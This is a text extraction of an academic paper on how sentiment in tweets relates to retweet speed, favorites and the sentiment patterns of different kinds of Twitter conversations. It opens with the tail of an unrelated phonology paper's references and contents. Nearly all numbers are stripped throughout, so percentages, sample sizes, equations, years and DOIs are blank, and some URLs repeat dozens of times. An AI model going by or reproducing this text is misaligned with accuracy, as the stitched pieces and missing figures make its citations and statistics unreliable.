ph.d. thesis, university of california at los angeles. jason riggle. . phonological features. available online at http://www.mml.cam.ac.uk/ dtal/courses/ugrad/paper_support/ li /riggle-feature-chart.pdf (re- trieved - - ). david sankoff. . probability and linguistic varia- tion. synthese, ( ): – . ferdinand de saussure. . course in general lin- guistics. columbia university press. english edi- tion of june , based on the translation by wade baskin. paul smolensky and géraldine legendre. . the harmonic mind: from neural computation to optimality-theoretic grammar (vol. : cognitive architecture). mit press. bruce tesar and paul smolensky. . learnability in optimality theory. linguistic inquiry, ( ): – . http://www.mml.cam.ac.uk/dtal/courses/ugrad/paper_support/li /riggle-feature-chart.pdf http://www.mml.cam.ac.uk/dtal/courses/ugrad/paper_support/li /riggle-feature-chart.pdf http://www.mml.cam.ac.uk/dtal/courses/ugrad/paper_support/li /riggle-feature-chart.pdf bruce tesar. . contrast analysis in phonological learning. technical report roa- , rutgers opti- mality archive. bruce tesar. . output-driven phonology: theory and learning. cambridge university press. reyyan yeniterzi. . exploiting morphology in turkish named entity recognition system. in proc. of the acl student session, pages – . introduction formal framework probability model discussion: why probability? mapping urs to srs: the phonology s generating urs: the lexicon model m prior over the parameters inference a bayesian network loopy belief propagation discussion: the finite-state requirement loopy bp implementation details parameter learning features of the phonology model experimental design evaluation methodology datasets comparison systems results related work conclusions and future work quantifying the effect of sentiment on information diffusion in social media submitted june accepted september published september corresponding author emilio ferrara, ferrarae@isi.edu, emilio.ferrara@gmail.com academic editor ciro cattuto additional information and declarations can be found on page doi . /peerj-cs. copyright ferrara and yang distributed under creative commons cc-by . open access quantifying the effect of sentiment on information diffusion in social media emilio ferrara , and zeyao yang information sciences institute, university of southern california, marina del rey, ca, united states school of informatics and computing, indiana university, bloomington, in, united states abstract social media has become the main vehicle of information production and consumption online. millions of users every day log on their facebook or twitter accounts to get updates and news, read about their topics of interest, and become exposed to new opportunities and interactions. although recent studies suggest that the contents users produce will affect the emotions of their readers, we still lack a rigorous understanding of the role and effects of contents sentiment on the dynamics of information diffusion. this work aims at quantifying the effect of sentiment on information diffusion, to understand: (i) whether positive conversations spread faster and/or broader than negative ones (or vice-versa); (ii) what kind of emotions are more typical of popular conversations on social media; and, (iii) what type of sentiment is expressed in conversations characterized by different temporal dynamics. our findings show that, at the level of contents, negative messages spread faster than positive ones, but positive ones reach larger audiences, suggesting that people are more inclined to share and favorite positive contents, the so-called positive bias. as for the entire conversations, we highlight how different temporal dynamics exhibit different sentiment patterns: for example, positive sentiment builds up for highly-anticipated events, while unexpected events are mainly characterized by negative sentiment. our contribution represents a step forward to understand how the emotions expressed in short texts correlate with their spreading in online social ecosystems, and may help to craft effective policies and strategies for content generation and diffusion. subjects data mining and machine learning, data science, network science and online social networks keywords computational social science, social networks, social media, sentiment analysis, information diffusion introduction the emerging field of computational social science has been focusing on studying the characteristics of techno-social systems (lazer et al., ; vespignani, ; kaplan & haenlein, ; asur & huberman, ; cheng et al., ) to understand the effects of technologically-mediated communication on our society (gilbert & karahalios, ; ferrara, ; tang, lou & kleinberg, ; de meo et al., ; backstrom & kleinberg, ). research on information diffusion focused on the complex dynamics that characterize social media discussions (java et al., ; huberman, romero & wu, ; bakshy et al., ; ferrara et al., a) to understand their role as central fora how to cite this article ferrara and yang ( ), quantifying the effect of sentiment on information diffusion in social media. peerj comput. sci. :e ; doi . /peerj-cs. mailto:ferrarae@isi.edu mailto:emilio.ferrara@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. to debate social issues (conover et al., b; conover et al., a; varol et al., ), to leverage their ability to enhance situational, social, and political awareness (sakaki, okazaki & matsuo, ; centola, ; centola, ; bond et al., ; ratkiewicz et al., ; metaxas & mustafaraj, ; ferrara et al., ), or to study susceptibility to influence and social contagion (aral, muchnik & sundararajan, ; aral & walker, ; myers, zhu & leskovec, ; anderson et al., ; lerman & ghosh, ; ugander et al., ; weng & menczer, ; weng, menczer & ahn, ). the amount of information that generated and shared through online platforms like facebook and twitter yields unprecedented opportunities to millions of individuals every day (kwak et al., ; gomez rodriguez, leskovec & schölkopf, ; ferrara et al., b). yet, how understanding of the role of the sentiment and emotions conveyed through the content produced and consumed on these platforms is shallow. in this work we are concerned in particular with quantifying the effect of sentiment on information diffusion in social networks. although recent studies suggest that emotions are passed via online interactions (harris & paradice, ; mei et al., ; golder & macy, ; choudhury, counts & gamon, ; kramer, guillory & hancock, ; ferrara & yang, ; beasley & mason, ), and that many characteristics of the content may affect information diffusion (e.g., language-related features (nagarajan, purohit & sheth, ), hashtag inclusion (suh et al., ), network structure (recuero, araujo & zago, ), user metadata (ferrara et al., )), little work has been devoted to quantifying the extent to which sentiment drives information diffusion in online social media. some studies sug- gested that content conveying positive emotions could acquire more attention (kissler et al., ; bayer, sommer & schacht, ; stieglitz & dang-xuan, ) and trigger higher levels of arousal (berger, ), which can further affect feedback and reciprocity (dang- xuan & stieglitz, ) and social sharing behavior (berger & milkman, ). in this study, we take twitter as scenario, and we explore the complex dynamics intertwining sentiment and information diffusion. we start by focusing on content spreading, exploring what effects sentiment has on the diffusion speed and on content popularity. we then shift our attention to entire conversations, categorizing them into different classes depending on their temporal evolution: we highlight how different types of discussion dynamics exhibit different types of sentiment evolution. our study timely furthers our understanding of the intricate dynamics intertwining information diffusion and emotions on social media. materials and methods sentiment analysis sentiment analysis was proven an effective tool to analyze social media streams, especially for predictive purposes (pang & lee, ; bollen, mao & zeng, ; bollen, mao & pepe, ; le, ferrara & flammini, ). a number of sentiment analysis methods have been proposed to date to capture content sentiment, and some have been specifically designed for short, informal texts (akkaya, wiebe & mihalcea, ; paltoglou & thelwall, ; hutto & gilbert, ). to attach a sentiment score to the tweets in our dataset, we here ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. adopt a sentistrength, a promising sentiment analysis algorithm that, if compared to other tools, provides several advantages: first, it is optimized to annotate short, informal texts, like tweets, that contain abbreviations, slang, and the like. sentistrength also employs additional linguistic rules for negations, amplifications, booster words, emoticons, spelling corrections, etc. research applications of sentistrength to myspace data found it particularly effective at capturing positive and negative emotions with, respectively, . % and . % accuracy (thelwall et al., ; thelwall, buckley & paltoglou, ; stieglitz & dang-xuan, ). the algorithm assigns to each tweet t a positive s+(t) and negative s−(t) sentiment score, both ranging between (neutral) and (strongly positive/negative). starting from the sentiment scores, we capture the polarity of each tweet t with one single measure, the polarity score s(t), defined as the difference between positive and negative sentiment scores: s(t) = s+(t) − s−(t). ( ) the above-defined score ranges between − and + . the former score indicates an extremely negative tweet, and occurs when s+(t) = and s−(t) = . vice-versa, the latter identifies an extremely positive tweet labeled with s+(t) = and s−(t) = . in the case s+(t) = s−(t)—positive and negative sentiment scores for a tweet t are the same— the polarity s(t) = of tweet t is considered as neutral. we decided to focus on the polarity score (rather than the two dimensions of sentiment separately) because previous studies highlighted the fact that measuring the overall sentiment is easier and more accurate than trying to capture the intensity of sentiment—this is especially true for short texts like tweets, due to the paucity of information conveyed in up to characters (thelwall et al., ; thelwall, buckley & paltoglou, ; stieglitz & dang-xuan, ; ferrara & yang, ). data the dataset adopted in this study contains a sample of all public tweets produced during september . from the twitter gardenhose (a roughly % sample of the social stream that we process and store at indiana university) we extracted all tweets in english that do not contain urls or media content (photos, videos, etc.) produced in that month. this choice is dictated by the fact that we can hardly computationally capture the sentiment or emotions conveyed by multimedia content, and processing content from external resources (such as webpages, etc.) would be computationally hard. this dataset comprises of , , tweets (more than six times larger than the facebook experiment (kramer, guillory & hancock, )) produced by , , distinct users. all tweets are processed by sentistrength and attached with sentiment scores (positive and negative) and with the polarity score calculated as described before. we identify three classes of tweets’ sentiment: negative (polarity score s ≤ − ), neutral (s = ), and positive (s ≥ ). negative, neutral, and positive tweets account for, respectively, . %, . % and . % of the total. the distribution of polarity scores is captured by fig. : we can see it is peaked around neutral tweets, accounting for over two-fifths of the total, while overall the distribution is ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure distribution of polarity scores computed for our dataset. the polarity score s is the dif- ference between positive and negative sentiment scores as calculated by sentistrength. the dataset (n = , , tweets, by m = , , different users) contains . % of neutral (s = ), . % of positive (s ≥ ), and . % of negative (s ≤ − ) tweets, respectively. slightly skewed toward positiveness. we can also observe that extreme values of positive and negative tweets are comparably represented: for example, there are slightly above thousand tweets with polarity score s = + , and about thousands with opposite polarity of s = − . results the role of sentiment on information diffusion here we are concerned with studying the relation between content sentiment and information diffusion. figure shows the effect of content sentiment on the information diffusion dynamics and on content popularity. we measure three aspects of information diffusion, as function of tweets polarity scores: fig. a shows the average number of retweets collected by the original posts as function of the polarity expressed therein; similarly, fig. b shows the average number of times the original tweet has been favorited; fig. c illustrates the speed of information diffusion, as reflected by the average number of seconds that occur between the original tweet and the first retweet. both figs. a and c focus only on tweets that have been retweeted at least once. figure b considers only tweets that have been favorited at least once. note that a large fraction of tweets are never retweeted ( . % in our dataset) or favorited ( . %): fig. a is based on the , , tweets that have been retweeted at least once (rt ≥ ), fig. b reports on the , , tweets that have favorited at least once, and fig. c is comprised of the , , tweets for which we have observed the first retweet in our dataset (so that we can compute the time between the original tweet and the first retweet). note that the retweet count is extracted from the tweet metadata, instead of being calculated as the number of times we observe a retweet of each tweet in our dataset, in order to avoid the bias due to the sampling rate of the twitter gardenhose. for this reason, the average number of retweets reported in ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure the effect of sentiment on information diffusion. (a) the average number of retweets, (b) the average number of favorites, and (c) the average number of seconds passed before the first retweet, as a function of the polarity score of the given tweet. the number on the points represent the amount of tweets with such polarity score in our sample. bars represent standard errors. fig. a seems pretty high (above for all classes of polarity scores): by capturing the “true” number of retweets we well reflect the known broad distributions of content popularity of social media, skewing the values of the means toward larger figures. the very same reasoning applies for the number of favorites. due to the high skewness of the distributions of number of retweets, number of favorites, and time before first retweet, we performed the same analysis as above on median values rather than averages. the same trends hold true: particularly interesting, average and median seconds before the first retweet are substantially identical. the results for the average and median number of retweets and favorites are also comparable, factoring out some small fluctuations. two important considerations emerge from the analysis of fig. : (i) positive tweets spread broader than neutral ones, and collect more favorites, but interestingly negative posts do not spread any more or less than neutral ones, neither get more or less favorited. this suggests the hypothesis of observing the presence of positivity bias (garcia, garas & schweitzer, ) (or pollyanna hypothesis (boucher & osgood, )), that is the tendency of individuals to favor positive rather than neutral or negative items, and choose what information to favor or rebroadcast further accordingly to this bias. (ii) negative content spread much faster than positive ones, albeit not significantly faster than neutral ones. this suggests that positive tweets require more time to be rebroadcasted, while negative or neutral posts generally achieve their first retweet twice as fast. interestingly, previous studies on information cascades showed that all retweets after the first take increasingly less time, which means that popular content benefit from a feedback loop that speeds up the diffusion more and more as a consequence of the increasing popularity (kwak et al., ). conversations’ dynamics and sentiment evolution to investigate how sentiment correlates with content popularity, we now only consider active and exclusive discussions occurred on twitter in september . each topic of discussion is here identified by its most common hashtag. active discussions are defined as those with more than tweets (in our dataset, which is roughly a % sample of the ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure dynamical classes of popularity capturing four different types of twitter conversa- tions. (a) shows the gaussian mixture model employed to discover the four classes. the y and x axes represent, respectively, the proportion of tweets occurring before and after the peak of popularity of a given discussion. different colors represent different classes: anticipatory discussions (blue dots), unexpected events (green), symmetric discussions (red), transient events (black). (b) shows the bic scores of different number of mixture components for the gmm (the lower the bic the better the gmm captures the data). the star identifies the optimal number of mixtures, four, best captured by the full model. public tweets), and exclusive ones are defined as those whose hashtag never appeared in the previous (august ) and the next (october ) month. inspired by previous studies that aimed at finding how many types of different conversations occur on twitter (kwak et al., ; lehmann et al., ), we characterize our discussions according to three features: the proportion pb of tweets produced within the conversation before its peak, the proportion pd of tweets produced during the peak, and finally the proportion pa of tweets produced after the peak. the peak of popularity of the conversation is simply the day which exhibits the maximum number of tweets with that given hashtag. we use the expectation maximization (em) algorithm to learn an optimal gaussian mixture model (gmm) in the (pb,pa) space. to determine the appropriate number of components (i.e., the number of types of conversations), we adopt three gmm models (spherical, diagonal, and full) and perform a -fold cross-validation using the bayesian information criterion (bic) as quality measure. we vary the number of components from to . figure b shows the bic scores for different number of mixtures: the lower the bic score, the better. the outcome of this process determines that the optimal number of components is four, in agreement with previous studies (lehmann et al., ), as captured the best by the full gmm model. in fig. a we show the optimal ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure example of four types of twitter conversations reflecting the respective dynamical classes in our dataset. (a) shows one example of anticipatory discussion (#tennvsou); (b) an unexpected event (#mileypor principales); (c) a symmetric discussion (#prayforrise); and (d) a transient event (#kdwbmeeted). gmm that identifies the four classes of conversation: the two dimensions represent the proportion pb of tweets occurring before (y axis) and pa after (x axis) the peak of popularity of each conversation. the four classes correspond to: (i) anticipatory discussions (blue dots), (ii) unexpected events (green), (iii) symmetric discussions (red), and (iv) transient events (black). antici- patory conversations (blue) exhibit most of the activity before and during the peak. these discussions build up over time registering an anticipatory behavior of the audience, and quickly fade out after the peak. the complementary behavior is exhibited by discussions around unexpected events (green dots): the peak is reached suddenly as a reaction to some exogenous event, and the discussion quickly decays afterwards. symmetric discussions (red dots) are characterized by a balanced number of tweets produced before, during, and after the peak time. finally, transient discussions (black dots) are typically bursty but short events that gather a lot of attention, yet immediately phase away afterwards. according to this classification, out of , active and exclusive conversations (hashtags) observed in september , we obtained hashtags of class a (anticipatory), of class b (unexpected), of class c (symmetric), and , of class d (transient), respectively. figure shows examples representing the four dynamical classes of conversations registered in our dataset. the conversation lengths are all set to days, and centered at the peak day (time window ). ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure a represents an example of anticipatory discussion: the event captured (#ten- nvsou) is the football game tennessee volunteers vs. oklahoma sooners of sept. , . the anticipatory nature of the discussion is captured by the increasing amount of tweets generated before the peak (time window ) and by the drastic drop afterwards. figure b shows an example (#mileypor principales) of discussion around an unexpected event, namely the release by los principales of an exclusive interview to miley cyrus, on sept. , . there is no activity before the peak point, that is reached immediately the day of the news release, and after that the volume of discussion decreases rapidly. figure c represents the discussion of a symmetric event: #prayforrise was a hashtag adopted to support rise, the singer of the k-pop band ladies’ code, who was involved in a car accident that eventually caused her death. the symmetric activity of the discussion perfectly reflects the events : the discussion starts the day of the accident, on september , , and peaks wikipedia: ladies’ code— http://en. wikipedia.org/wiki/ladies% code. the day of rise’s death (after four days from the accident, on september , ), but the fans’ conversation stays alive to commemorate her for several days afterwards. lastly, fig. d shows one example (#kdwbmeeted) of transient event, namely the radio station kdwb announcing a lottery drawing of the tickets for ed sheeran’s concert, on sept. , . the hype is momentarily and the discussion fades away immediately after the lottery is concluded. figure shows the evolution of sentiment for the four classes of twitter conversations: it can be useful to remind the average proportions of neutral ( . %), positive ( . %), and negative ( . %) sentiments in our dataset, to compare them against the distributions for popular discussions. also worth noting, although each discussion is hard-cast in a class (anticipatory, unexpected, symmetric, or transient), sometimes spurious content might appear before or after the peak, causing the presence of some small amount of tweets where ideally we would not expect any (for example, some tweets appear after the peak of an anticipatory discussion). we grayed out the bars in figs. a, b and d, to represent non-significant amounts of tweets that are present only as byproduct of averaging across all conversations belonging to each specific class. these intervals therefore do not convey any statistically significant information and are disregarded. (a) for anticipatory events, the amount of positive sentiment grows steadily until the peak time, while the negative sentiment is somewhat constant throughout the entire anticipatory phase. notably, the amount of negative content is much below the dataset average, fluctuating between % and % (almost half of the dataset average), while the positive content is well above average, ranging between % and %. this suggests that, in general, anticipatory popular conversations are emotionally positive. (b) the class of unexpected events intuitively carries more negative sentiment, that stays constant throughout the entire discussion period to levels of the dataset average. (c) symmetric popular discussions are characterized by a steadily decreasing negative emotions, that goes from about % (above dataset’s average) at the inception of the discussions, to around % toward the end of the conversations. complementary behavior happens for positive emotions, that start around % (equal to the dataset average) and steadily grow up to % toward the end. this suggests that in symmetric conversations there is a general ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://dx.doi.org/ . /peerj-cs. figure evolution of positive and negative sentiment for different types of twitter conversations. the four panels show the average distribution of tweet proportion, and the average positive (s ≥ ) and negative (s ≤ − ) tweet proportions, for the four classes respectively: (a) anticipatory discussion; (b) unexpected event; (c) symmetric discussion; and, (d) transient discussion. shift of emotions toward positiveness over time. (d) finally, transient events, due to their short-lived lengths, represent more the average discussions, although they exhibit lower levels of negative sentiments (around %) and higher levels of positive ones (around %) with respect to the dataset’s averages. discussion the ability to computationally annotate at scale the emotional value of short pieces of text, like tweets, allowed us to investigate the role that emotions and sentiment expressed into social media content plays with respect to the diffusion of such information. our first finding in this study sheds light on how sentiment correlates with the speed and the reach of the diffusion process: tweets with negative emotional valence spread faster than neutral and positive ones. in particular, the time that passes between the publication of the original post and the first retweet is almost twice as much, on average, for positive tweets than for negative ones. this might be interpreted in a number of ways, the most likely being that content that conveys negative sentiments trigger stronger reactions in the readers, some of which might be more prone to share that piece of information with higher chance than any neutral or positive content. however, the positivity bias (or pollyanna effect) (garcia, garas & schweitzer, ; boucher & osgood, ) rapidly kicks in when ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. we analyze how many times the tweets become retweeted or favorited: individuals online clearly tend to prefer positive tweets, which are favorited as much as five times more than negative or neutral ones; the same holds true for the amount of retweets collected by positive posts, which is up to . times more than negative or neutral ones. these insights provide some clear directives in terms of best practices to produce popular content: if one aims at triggering a quick reaction, negative sentiments outperform neutral or positive emotions. this is the reason why, for example, in cases of emergencies and disasters, misinformation and fear spread so fast in online environments (ferrara et al., ). however, if one aims at long-lasting diffusion, then positive content ensures wide reach and the most preferences. the second part of our study focuses on entire conversations, and investigates how different sentiment patterns emerge from discussions characterized by different temporal signatures (kwak et al., ; lehmann et al., ): we discover that, in general, highly-anticipated events are characterized by positive sentiment, while unexpected events are often harbingers of negative emotions; yet, transient events, whose duration is very brief, represent the norm on social media like twitter and are not characterized by any particular emotional valence. these results might sound unsurprising, yet they have not been observed before: common sense would suggest, for example, that unprecedented conversations often relate to unexpected events, such as disasters, emergencies, etc., that canalize vast negative emotions from the audience, including fear, sorrow, grief, etc. (sakaki, okazaki & matsuo, ). anticipated conversations instead characterize events that will occur in the foreseeable future, such as a political election, a sport match, a movie release, an entertainment event, or a recurring festivity: such events are generally positively received, yet the attention toward them quickly phases out after their happening (lehmann et al., ; mestyán, yasseri & kertész, ; le, ferrara & flammini, ). elections and sport events might represent special cases, as they might open up room for debate, “flames”, polarized opinions, etc. (ratkiewicz et al., ; bond et al., ) (such characteristics have indeed been exploited to make predictions (asur & huberman, ; metaxas & mustafaraj, ; le, ferrara & flammini, )). the findings of this paper have very practical consequences that are relevant both for economic and social impact: understanding the dynamics of information diffusion and the effect of sentiment on such phenomena becomes crucial if one, for example, wants to craft a policy to effectively communicate with an audience. the applications range from advertisement and marketing, to public policy and emergency management. recent events, going for tragic episodes of terrorism, to the emergence of pandemics like ebola, have highlighted once again how central social media are in the timely diffusion of information, yet how dangerous they can be when they are abused or misused to spread misinformation or fear. our contribution pushes forward previous studies on sentiment and information diffusion (dang-xuan & stieglitz, ) and furthers our understanding of how the emotions expressed in a short piece of text might correlated with its spreading in online social ecosystems, helping to craft effective information diffusion strategies that account for the emotional valence of the content. ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. acknowledgements ef is grateful to filippo menczer, yy ahn, sune lehmann, and johan bollen for interesting discussions, and to alessandro flammini and lorenzo coviello for their precious feedback on the project and extensive comments on the manuscript. additional information and declarations funding ef was partly supported by onr grant no. n a- - . zy was partly supported by nsf grant no. iis- . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: onr: n a- - . nsf: iis- . competing interests the authors declare there are no competing interests. author contributions • emilio ferrara conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • zeyao yang performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work. data availability the following information was supplied regarding data availability: data was collected through the public twitter api (https://dev.twitter.com/overview/ api). to comply with twitter terms of service, data cannot be publicly shared. interested future researchers may reproduce the experiments by following the procedure described in the paper. anonymized data may be available upon request from dr. emilio ferrara (ferrarae@isi.edu). references akkaya c, wiebe j, mihalcea r. . subjectivity word sense disambiguation. in: proceedings of the conference on empirical methods in natural language processing. acl, – . anderson a, huttenlocher d, kleinberg j, leskovec j. . effects of user similarity in social media. in: proceedings of the fifth acm international conference on web search and data mining. acm, – . ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://dx.doi.org/ . /peerj-cs. aral s, muchnik l, sundararajan a. . distinguishing influence-based contagion from homophily-driven diffusion in dynamic networks. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . aral s, walker d. . identifying influential and susceptible members of social networks. science ( ): – doi . /science. . asur s, huberman ba. . predicting the future with social media. in: ieee/wic/acm international conference on web intelligence and intelligent agent technology. ieee, – . backstrom l, kleinberg j. . romantic partnerships and the dispersion of social ties: a network analysis of relationship status on facebook. in: proceedings of the th acm conference on computer supported cooperative work & social computing. acm, – . bakshy e, rosenn i, marlow c, adamic l. . the role of social networks in information diffusion. in: proceedings of the st international conference on world wide web, – . bayer m, sommer w, schacht a. . font size matters—emotion and attention in cortical responses to written words. plos one ( ):e doi . /journal.pone. . beasley a, mason w. . emotional states vs. emotional words in social media. in: acm conference on web science. acm. berger j. . arousal increases social transmission of information. psychological science ( ): – doi . / . berger j, milkman kl. . what makes online content viral? journal of marketing research ( ): – doi . /jmr. . . bollen j, mao h, pepe a. . modeling public mood and emotion: twitter sentiment and socio-economic phenomena. in: international aaai conference on weblogs and social media. aaai, – . bollen j, mao h, zeng x. . twitter mood predicts the stock market. journal of computational science ( ): – doi . /j.jocs. . . . bond rm, fariss cj, jones jj, kramer ad, marlow c, settle je, fowler jh. . a -million-person experiment in social influence and political mobilization. nature ( ): – doi . /nature . boucher j, osgood ce. . the pollyanna hypothesis. journal of verbal learning and verbal behavior ( ): – doi . /s - ( ) - . centola d. . the spread of behavior in an online social network experiment. science ( ): – doi . /science. . centola d. . an experimental study of homophily in the adoption of health behavior. science ( ): – doi . /science. . cheng j, adamic l, dow pa, kleinberg jm, leskovec j. . can cascades be predicted? in: pro- ceedings of the rd international conference on world wide web, – . choudhury md, counts s, gamon m. . not all moods are created equal! exploring human emotional states in social media. in: international aaai conference on weblogs and social media, – . conover md, davis c, ferrara e, mckelvey k, menczer f, flammini a. a. the geospatial characteristics of a social movement communication network. plos one ( ):e doi . /journal.pone. . conover md, ferrara e, menczer f, flammini a. b. the digital evolution of occupy wall street. plos one ( ):e doi . /journal.pone. . ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /science. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . / http://dx.doi.org/ . /jmr. . http://dx.doi.org/ . /j.jocs. . . http://dx.doi.org/ . /nature http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /science. http://dx.doi.org/ . /science. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. dang-xuan l, stieglitz s. . impact and diffusion of sentiment in political communication-an empirical analysis of political weblogs. in: international aaai conference on weblogs and social media. aaai, – . de meo p, ferrara e, fiumara g, provetti a. . on facebook, most ties are weak. communications of the acm ( ): – doi . / . ferrara e. . a large-scale community structure analysis in facebook. epj data science ( ): – doi . /epjds . ferrara e, jafariasbagh m, varol o, qazvinian v, menczer f, flammini a. a. clustering memes in social media. in: ieee/acm international conference on advances in social networks analysis and mining. ieee, – . ferrara e, varol o, davis c, menczer f, flammini a. . the rise of social bots. arxiv preprint. arxiv: . . ferrara e, varol o, menczer f, flammini a. b. traveling trends: social butterflies or frequent fliers? in: first acm conference on online social networks. acm, – . ferrara e, yang z. . measuring emotional contagion in social media. arxiv preprint. arxiv: . . garcia d, garas a, schweitzer f. . positive words carry less information than negative words. epj data science ( ): – doi . /epjds . gilbert e, karahalios k. . predicting tie strength with social media. in: th sigchi conference on human factors in computing systems. acm, – . golder sa, macy mw. . diurnal and seasonal mood vary with work, sleep, and daylength across diverse cultures. science ( ): – doi . /science. . gomez rodriguez m, leskovec j, schölkopf b. . structure and dynamics of information pathways in online media. in: proceedings of the sixth acm international conference on web search and data mining. acm, – . harris rb, paradice d. . an investigation of the computer-mediated communication of emotions. journal of applied sciences research ( ): – . huberman b, romero d, wu f. . social networks that matter: twitter under the microscope. first monday ( ) – . hutto c, gilbert e. . vader: a parsimonious rule-based model for sentiment analysis of social media text. in: international aaai conference on weblogs and social media, – . java a, song x, finin t, tseng b. . why we twitter: understanding microblogging usage and communities. in: workshop on web mining and social network analysis, – . kaplan am, haenlein m. . users of the world, unite! the challenges and opportunities of social media. business horizons ( ): – doi . /j.bushor. . . . kissler j, herbert c, peyk p, junghofer m. . buzzwords early cortical responses to emotional words during reading. psychological science ( ): – doi . /j. - . . .x. kramer ad, guillory je, hancock jt. . experimental evidence of massive-scale emotional contagion through social networks. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . kwak h, lee c, park h, moon s. . what is twitter, a social network or a news media? in: proceedings of the th international conference on world wide web. acm, – . lazer d, pentland as, adamic l, aral s, barabasi al, brewer d, christakis n, contractor n, fowler j, gutmann m, jebara t, king g, macy m, roy d, van alstyne m. . life in the network: the coming age of computational social science. science ( ): – doi . /science. . ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . / http://dx.doi.org/ . /epjds http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . /epjds http://dx.doi.org/ . /science. 